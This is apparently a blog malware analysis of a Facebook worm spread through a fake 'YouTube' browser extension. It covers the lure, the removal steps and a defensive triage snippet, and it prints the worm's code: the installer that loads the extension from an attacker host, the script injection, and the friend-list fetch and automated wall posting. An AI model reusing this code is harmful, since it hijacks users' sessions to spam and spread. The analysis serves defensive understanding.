IT question and answers

facebook virus

image


First of all, sorry for the offensive picture above, but it must be familiar to many of you: some of us have fallen victim to this scam and have ended up being cursed by friends for postings we never made.

This scam, titled “[VIDEO] Yeahh!! It happens on Live Television!” and “Hey You Check The Sad post, I Dare you can watch this”, spreads itself by sharing its link on the victim’s friends’ walls and is right now one of the fastest-spreading scams on Facebook.

I decided to look into how this thing really works, and after digging into the virus code, I present a few facts about it:

  • This virus makes use of a method known as “Cross Site Scripting”: once installed, it injects its own code into every web page the user views.
  • This virus/spam uses social engineering brilliantly: it makes people believe that what they are about to install comes from a source they trust (in this case “YouTube”), so even when the browser asks whether they are sure they want to install the extension, they accept in the hope that this will let them see the video.
  • This virus may have been created by a Spanish guy, because most of the function names are in Spanish, for example “fb_comparte()” (comparte is a Spanish word which means ‘to share’).
  • This virus works only on Chrome and Firefox; it installs itself as a browser extension on those browsers, so if you use Internet Explorer, don’t worry if you have ever clicked on that link: you are safe.
  • The browser extension just adds a JavaScript to whatever page the user visits. This JavaScript does the rest of the work.
  • It picks 30 friends at random from the victim’s friend list and posts the link on their walls.
  • Once it is done posting, it sets a cookie named “fb_videoce_” in the victim’s browser, which tells the virus that it has already done the posting so that it doesn’t keep posting again.
  • This cookie stays in your browser for the next 300 days or until you clear your browser’s cache; once it is removed, the virus posts the link to 30 random friends again and recreates the cookie. So if you think that clearing the browser’s cache is going to remove the virus, don’t do it: it is just going to reactivate it.
  • In case you are wondering what the video actually is and whether it really exists: the video does exist and is of an Italian model, “Marika Fruscio”, who is wearing too little to keep her “assets” contained.

    For the “curious” kind, here’s the link to the video, and don’t worry, this link won’t post itself on your friends’ walls:

    http://www.youtube.com/embed/JfcTBeyDHls?wmode=transparent

So How Do I get Rid of this virus?

If your browser has been infected by this virus, all you need to do is simply check for an extension/add-on named “YouTube” and uninstall it from your browser.

To uninstall it from Chrome, click the wrench icon in the top right corner, go to Tools -> Extensions and remove the extension named “YouTube” from the window that opens.


To uninstall it from Firefox, click the Firefox button in the top left corner of the browser -> click Add-ons -> in the window that opens, click Extensions -> remove the extension named “YouTube”.




How does it fool the people into installing it?

Once a user clicks on the shared link, a page pops up with a box that looks somewhat like this:

Now, to the unsuspecting user, this looks like a YouTube video box asking for a missing plugin to be installed.

Clicking the “Install Plugin” link runs the following JavaScript:

// Browser detection from the user agent string
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar() {
    if (is_chrome) {
        // Chrome: open the packaged extension so the browser prompts to install it
        window.open("http://mieneeueueu.co.cc/yt/youtube.crx");
    } else if (is_firefox) {
        // Firefox: use InstallTrigger to prompt for the XPI, labelled "Youtube Extension"
        var params = {
            "Youtube Extension": {
                URL: "http://mieneeueueu.co.cc/yt/youtube.xpi",
                toString: function () { return this.URL; }
            }
        };
        InstallTrigger.install(params);
    } else {
        // Any other browser: just show the page with the real embedded video
        window.open("http://mieneeueueu.co.cc/yt/video.php");
    }
}

This piece of code checks the userAgent to find out which browser the user is using. If the user is on Firefox, the code tries to install a Firefox extension named youtube.xpi; if the browser is Chrome, it tries to install a Chrome extension, youtube.crx. In both cases the browser asks the user to confirm the installation, but since the user thinks it comes from a trusted source, they accept.

However, if the user is using some other browser, the code opens a page, video.php, which actually contains the promised YouTube embedded video.


The Technical Part Starts Here

If you are not the technical kind, you can skip directly to the conclusion, because in the next section I’ll explain the working of this virus in a more technical fashion.


How does the virus make the posting?

Once the browser extension is installed, it adds a JavaScript element to every page you visit. To do this, it executes the following code:

function addScript() {
    // Build a <script> element pointing at the payload hosted on the attacker's domain
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://mieneeueueu.co.cc/yt/extra.js");
    // Hang it off the page's first existing <script>; give up if the page has none
    var a = document.getElementsByTagName('script')[0];
    if (a == null) return false;
    a.appendChild(s);
    return true;
}

As can be seen in the above code, this adds a JavaScript file, “extra.js”, to whichever page you visit. This script checks whether the current URL matches the regex pattern /^http:\/\/(www\.)?facebook.com/i and, if it does, executes a function named fb_comparte(), which first makes an AJAX call to get a list of the victim’s friends and then another AJAX call to post the link on their walls.
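As an added illustration (not code from the post or from the extension), here is a small triage helper that applies the three indicators described above to a captured page: the URL trigger pattern, a <script> element loaded from an origin outside an allowlist, and the marker cookie. The page URL, HTML, cookie string and allowlist are constructed sample values; the trigger regex is the post’s own with the dot in facebook.com escaped.

```javascript
// Added example, not from the post or the extension: triage a captured page for the
// three indicators described above. All sample inputs below are constructed.

// The extension's trigger pattern as quoted in the post, with the dot escaped.
const FB_URL_RE = /^http:\/\/(www\.)?facebook\.com/i;
// The "already posted" marker cookie named in the post.
const MARKER_COOKIE = 'fb_videoce_';

// Return the origins of every <script src=...> in the markup that are not on the
// allowlist. A plain regex over the raw HTML is used so this runs without a DOM.
function unexpectedScriptOrigins(html, pageUrl, allowedOrigins) {
  const found = new Set();
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let origin;
    try { origin = new URL(m[1], pageUrl).origin; } catch (e) { continue; }
    if (!allowedOrigins.includes(origin)) found.add(origin);
  }
  return [...found];
}

// Parse a document.cookie-style "a=1; b=2" string into cookie names.
function cookieNames(cookieString) {
  return cookieString.split(';').map(c => c.trim().split('=')[0]).filter(Boolean);
}

// Combine the three checks into one report for the analyst.
function triagePage(pageUrl, html, cookieString, allowedOrigins) {
  return {
    payloadWouldFire: FB_URL_RE.test(pageUrl),
    injectedOrigins: unexpectedScriptOrigins(html, pageUrl, allowedOrigins),
    markerCookieSet: cookieNames(cookieString).includes(MARKER_COOKIE),
  };
}

// Constructed sample: a Facebook page after the extension has appended its element.
// The script host is the one quoted in the post; the other values are made up.
const SAMPLE_URL = 'http://www.facebook.com/home.php';
const SAMPLE_HTML =
  '<html><head><script src="/rsrc.php/main.js"></script>' +
  '<script type="text/javascript" src="http://mieneeueueu.co.cc/yt/extra.js"></script>' +
  '</head><body></body></html>';
const SAMPLE_COOKIES = 'c_user=100000000; fb_videoce_=1; datr=abc';
const ALLOWED_ORIGINS = ['http://www.facebook.com'];

console.log(triagePage(SAMPLE_URL, SAMPLE_HTML, SAMPLE_COOKIES, ALLOWED_ORIGINS));
```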

This is the AJAX call to Facebook’s “first_degree.php” page to retrieve a list of the victim’s friends:

// Synchronous GET (third argument false) to Facebook's typeahead endpoint, which
// returns the logged-in user's friend list; uid is the victim's Facebook user id
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
gf['send']();
if (gf['readyState'] != 4) {} else {
    // Facebook prefixes its JSON responses with "for (;;);" (9 characters) to block
    // cross-site JSON hijacking; code already running inside the page just strips it
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {
        return false;
    } else {
        a = data;
    }
}
// Cap the number of targets at 30 friends
var b = a['payload']['entries']['length'];
if (b > 30) {
    b = 30
};

And here’s the piece of code used for the posting; it makes AJAX calls to “composer.php” in a loop:

for (var f = 0; f < b; f++) {
    // Skip the victim's own entry in the friend list
    if (a['payload']['entries'][f]['uid'] != user_id) {
        // Build the post text from random phrase fragments (randomValue, p0..p3, video_url
        // and domains are defined elsewhere in extra.js) around the friend's first name
        message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
        var g = new XMLHttpRequest();
        d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
        title = '[VIDEO] Yeahh!! It happens on Live Television!';
        summary = 'Lol Checkout this video its very embracing moment for her';
        imagen = 'http://i.imgur.com/ZgjR4.jpg';
        // Form body for a wall post on the friend's profile (xhpc_targetid); it carries the
        // page's own tokens (post_form_id, fb_dtsg), so Facebook sees it as the victim's post
        e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id= 2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
        // Fire the post asynchronously and ignore the response
        g['open']('POST', d, true);
        g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
        g['setRequestHeader']('Content-length', e['length']);
        g['setRequestHeader']('Connection', 'keep-alive');
        g['onreadystatechange'] = function () {};
        g['send'](e);
    }
}

The conclusion:

After examining the complete code I have concluded that the virus does not pose any security threat to the victim, i.e. it does not log credit card numbers, passwords, etc. Right now it’s just a little nuisance creator, but you never know when someone decides to create a mutation of this virus that logs sensitive information from the victim’s browser.

The main thing to understand here is that this doesn’t stop at Facebook: a little change to the script could have it sending emails from your Gmail and Hotmail accounts.

Well folks, now that you know how this works, I hope you know how to keep yourselves safe from it. Stay safe.